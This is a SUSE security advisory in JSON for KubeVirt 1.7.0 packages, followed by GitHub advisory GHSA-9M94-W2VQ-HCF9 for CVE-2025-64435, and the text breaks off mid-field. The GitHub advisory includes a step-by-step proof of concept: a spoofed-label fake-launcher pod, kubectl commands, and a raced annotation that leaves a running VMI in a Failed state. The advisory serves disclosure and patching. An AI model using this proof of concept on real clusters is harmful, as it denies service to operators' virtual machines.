"product": {
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-controller-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-handler-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-operator-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-container-disk-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-tests-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-tests-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-api-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-controller-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-handler-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-operator-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64"
},
"product_reference": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64"
},
"product_reference": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T15:34:08Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T15:34:08Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
}
]
}
GHSA-9M94-W2VQ-HCF9
Vulnerability from github – Published: 2025-11-06 23:35 – Updated: 2025-11-17 21:43Summary
_Short summary of the problem. Make the impact and severity as clear as possible.
A logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
A vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate virt-launcher pod associated with the VMI.
The virt-launcher pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with virt-handler, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).
When virt-controller receives a notification about a change in a VMI's state, it attempts to identify the corresponding virt-launcher pod. This is necessary in several scenarios, including:
- When hardware devices are requested to be hotplugged into the VMI—they must also be hotplugged into the associated
virt-launcherpod. - When additional RAM is requested—this may require updating the
virt-launcherpod's cgroups. - When additional CPU resources are added—this may also necessitate modifying the
virt-launcherpod's cgroups. - When the VMI is scheduled to migrate to another node.
The core issue lies in the implementation of the GetControllerOf function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate virt-launcher, thereby compromising the VMI's integrity and control mechanisms.
//pkg/controller/controller.go
func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
// Get all pods from the VMI namespace which contain the label "kubevirt.io"
objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
if err != nil {
return nil, err
}
pods := []*k8sv1.Pod{}
for _, obj := range objs {
pod := obj.(*k8sv1.Pod)
pods = append(pods, pod)
}
var curPod *k8sv1.Pod = nil
for _, pod := range pods {
if !IsControlledBy(pod, vmi) {
continue
}
if vmi.Status.NodeName != "" &&
vmi.Status.NodeName != pod.Spec.NodeName {
// This pod isn't scheduled to the current node.
// This can occur during the initial migration phases when
// a new target node is being prepared for the VMI.
continue
}
// take the most recently created pod
if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
curPod = pod
}
}
return curPod, nil
}
// pkg/controller/controller_ref.go
// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
controllerRef := metav1.GetControllerOf(pod)
if controllerRef != nil {
return controllerRef
}
// We may find pods that are only using CreatedByLabel and not set with an OwnerReference
if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
name := pod.Annotations[virtv1.DomainAnnotation]
uid := types.UID(createdBy)
vmi := virtv1.NewVMI(name, uid)
return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
}
return nil
}
func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
if controllerRef := GetControllerOf(pod); controllerRef != nil {
return controllerRef.UID == vmi.UID
}
return false
}
The current logic assumes that a virt-launcher pod associated with a VMI may not always have a controllerRef. In such cases, the controller falls back to inspecting the pod's labels. Specifically it evaluates the kubevirt.io/created-by label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the virt-controller selects the most recently created one.
This logic appears to be designed with migration scenarios in mind, where it is expected that two virt-launcher pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate virt-launcher pod lacks a controllerRef and relies solely on labels (such as kubevirt.io/created-by) to indicate its association with a VMI.
This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate virt-launcher pod. As a result, the CurrentVMIPod function could mistakenly return the attacker-controlled pod instead of the authentic one.
This vulnerability has at least two serious consequences:
- The attacker could disrupt or seize control over the VMI's lifecycle operations.
- The attacker could potentially influence the VMI's migration target node, bypassing node-level security constraints such as
nodeSelectorornodeAffinity, which are typically used to enforce workload placement policies.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Consider the following VMI definition:
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
name: launcher-label-confusion
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml
# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11
# Find the UID of the associated to the VMI `virt-launcher` pods (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}
The UID of the VMI can also be found as an argument to the container in the virt-launcher pod:
# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched
operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
"command": [
"/usr/bin/virt-launcher-monitor",
...
"--uid",
"18afb8bf-70c4-498b-aece-35804c9a0d11",
"--namespace",
"default",
...
Consider the following attacker-controlled pod which is associated to the VMI using the UID defined in the kubevirt.io/created-by label:
apiVersion: v1
kind: Pod
metadata:
name: fake-launcher
labels:
kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
kubevirt.io/domain: migration
spec:
restartPolicy: Never
containers:
- name: alpine
image: alpine
command: [ "sleep", "3600" ]
operator@minikube:~$ kubectl apply -f fake-launcher.yaml
# Get the UID of the `fake-launcher` pod
operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13
To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:
# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched
# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID
To illustrate the impact of this vulnerability, a race condition will be triggered in the sync function of the VMI controller:
// pkg/virt-controller/watch/vmi.go
func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
//...
if !isTempPod(pod) && controller.IsPodReady(pod) {
// mark the pod with annotation to be evicted by this controller
newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
// here a new updated pod is returned
patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
if err != nil {
return common.NewSyncError(err, controller.FailedPodPatchReason), pod
}
pod = patchedPod
// ...
func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
patchSet := patch.New()
for key, newValue := range newAnnotations {
if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
patchSet.AddOption(
patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
)
}
}
if patchSet.IsEmpty() {
return pod, nil
}
patchBytes, err := patchSet.GeneratePayload()
// ...
patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
// ...
return patchedPod, nil
}
The above code adds additional annotations to the virt-launcher pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.
There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:
// pkg/virt-controller/watch/vmi.go
func isTempPod(pod *k8sv1.Pod) bool {
// EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
return ok
}
// pkg/virt-controller/watch/vmi.go
func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
// ...
vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
tempPodExists := controller.PodExists(pod) && isTempPod(pod)
//...
case vmi.IsRunning():
if !vmiPodExists {
// MK: this will toggle the VMI phase to Failed
vmiCopy.Status.Phase = virtv1.Failed
break
}
//...
vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
if vmiChanged {
// MK: this will detect that the phase of the VMI has changed and updated the resource
key := controller.VirtualMachineInstanceKey(vmi)
c.vmiExpectations.SetExpectations(key, 1, 0)
_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
if err != nil {
c.vmiExpectations.LowerExpectations(key, 1, 0)
return err
}
}
To trigger it, the attacker should update the fake-launcher pod's annotations before the check vmiPodExists := controller.PodExists(pod) && !isTempPod(pod) in sync, and between the check if !isTempPod(pod) && controller.IsPodReady(pod) in sync but before the patch API call in syncPodAnnotations as follows:
annotations:
kubevirt.io/ephemeral-provisioning: "true"
The above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).
The update should also happen during the reconciliation loop when the fake-launcher pod is initially going to be associated with the VMI and its labels, related to eviction, updated.
Upon successful exploitation the VMI is marked as failed and could not be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:
operator@minikube:~$ kubectl get vmi
NAME AGE PHASE IP NODENAME READY
launcher-label-confusion 128m Failed 10.244.0.10 minikube False
# The VMI is not reachable anymore
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status
# The two pods are still associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}
Impact
As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.0-beta.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64435"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:35:24Z",
"nvd_published_at": "2025-11-07T23:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nA logic flaw in the `virt-controller` allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate `virt-launcher` pod associated with the VMI. This can mislead the `virt-controller` into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nA vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate `virt-launcher` pod associated with the VMI.\n\nThe `virt-launcher` pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with `virt-handler`, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).\n\nWhen `virt-controller` receives a notification about a change in a VMI\u0027s state, it attempts to identify the corresponding `virt-launcher` pod. This is necessary in several scenarios, including:\n\n- When hardware devices are requested to be hotplugged into the VMI\u2014they must also be hotplugged into the associated `virt-launcher` pod.\n- When additional RAM is requested\u2014this may require updating the `virt-launcher` pod\u0027s cgroups.\n- When additional CPU resources are added\u2014this may also necessitate modifying the `virt-launcher` pod\u0027s cgroups.\n- When the VMI is scheduled to migrate to another node.\n\nThe core issue lies in the implementation of the `GetControllerOf` function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate `virt-launcher`, thereby compromising the VMI\u0027s integrity and control mechanisms.\n\n```go\n//pkg/controller/controller.go\n\nfunc CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {\n\t// Get all pods from the VMI namespace which contain the label \"kubevirt.io\"\n\tobjs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tpods := []*k8sv1.Pod{}\n\tfor _, obj := range objs {\n\t\tpod := obj.(*k8sv1.Pod)\n\t\tpods = append(pods, pod)\n\t}\n\n\tvar curPod *k8sv1.Pod = nil\n\tfor _, pod := range pods {\n\t\tif !IsControlledBy(pod, vmi) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif vmi.Status.NodeName != \"\" \u0026\u0026\n\t\t\tvmi.Status.NodeName != pod.Spec.NodeName {\n\t\t\t// This pod isn\u0027t scheduled to the current node.\n\t\t\t// This can occur during the initial migration phases when\n\t\t\t// a new target node is being prepared for the VMI.\n\t\t\tcontinue\n\t\t}\n\t\t// take the most recently created pod\n\t\tif curPod == nil || curPod.CreationTimestamp.Before(\u0026pod.CreationTimestamp) {\n\t\t\tcurPod = pod\n\t\t}\n\t}\n\treturn curPod, nil\n}\n```\n\n```go\n// 